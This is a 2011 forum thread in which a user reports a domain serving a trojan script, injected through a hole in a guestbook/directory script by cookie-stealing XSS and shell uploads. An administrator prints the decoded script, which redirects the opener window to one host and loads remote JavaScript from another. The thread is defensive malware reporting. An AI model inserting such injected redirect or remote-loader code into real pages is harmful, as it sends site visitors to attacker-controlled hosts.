Author Topic: Trojan - bestxxx.org  (Read 4156 times)

0 Members and 1 Guest are viewing this topic.

February 16, 2011, 02:37:11 pm
Read 4156 times

gimcnuk

  • Newbie

  • Offline
  • *

  • 7
Please, add in Your base following domain: bestxxx.org

Code: [Select]
http://bestxxx.org/images/s.js Trojan
Hacking is going through hole in script GB Top-Directory (http://gbscript.com/)
1. XSS-injection with stealing cookies from admin section through this script: bestxxx.org/images/img.php?
2. Uploading shells on server and inserting JS-code from this page: bestxxx.org/images/s.js

Details (in russian) here: http://mastertalk.ru/topic127171.html - there also decoded version of trojan
Russian support of hosting only deletes scripts but lately its was restored in the same places.

Thanks.

February 16, 2011, 08:21:34 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I'm sorry, but I can't reproduce what you reported.

hxxp://bestxxx.org/images/img.php? just returns a gif image.

bestxxx.org/images/s.js decodes to
Code: [Select]
<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://xtds.in';</script>
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>

Neither hxxp://xtds.in nor hxxp://www.clayaim.com/index.php?ref=webex leads me to any malware.
Ruining the bad guy's day

February 17, 2011, 01:27:11 pm
Reply #2

gimcnuk

  • Newbie

  • Offline
  • *

  • 7
This code was inserted into many sites. By abuse it was deleted but lately restored in the same place, that means this code added by owner site.